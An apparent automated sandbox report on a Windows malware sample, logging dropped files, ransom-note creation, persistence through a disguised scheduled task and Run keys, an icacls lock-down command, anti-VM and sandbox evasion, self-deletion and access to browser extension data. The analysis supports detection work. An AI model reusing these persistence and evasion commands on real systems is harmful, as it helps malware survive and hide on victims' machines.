Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E59BCE push eax; iretd	0_2_02E59BCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E59DB6 push esi; iretd	0_2_02E59DB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E59DB2 push ds; retf	0_2_02E59DB4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E5351E push AFD66869h; ret	0_2_02E53523
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004026D2 push ebx; ret	4_2_004026EA
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004026ED pushad ; ret	4_2_004026F4
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004026F7 push ebx; ret	4_2_00402714
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402745 push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_0040273B push edi; ret	4_2_00402742
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402595 push ss; ret	4_2_0040259C
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004027BB push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_02EE2822 push edi; ret	4_2_02EE27D4

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rujtcgu	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E609.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rujtcgu

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\$WinREAgent\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\$WinREAgent\Scratch\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File created: C:\Users\user\_readme.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rujtcgu:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

10_2_00481920

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rujtcgu, 00000004.00000002.1982713687.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: rujtcgu, 00000022.00000002.2344189167.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKC
Source: build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: file.exe, 00000000.00000002.1710176306.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK'

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 9_2_0497771C rdtsc

9_2_0497771C

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 15_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

15_2_00481920

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		10_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		15_2_0040E670

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 428	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1382	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 614	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 743	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 745	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 414
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 395

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_10-39505

Source: C:\Windows\explorer.exe TID: 5088	Thread sleep time: -138200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6516	Thread sleep time: -61400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6472	Thread sleep time: -30900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe TID: 6596	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164	Thread sleep count: 183 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164	Thread sleep time: -41175s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	10_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	15_2_0040FB98

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
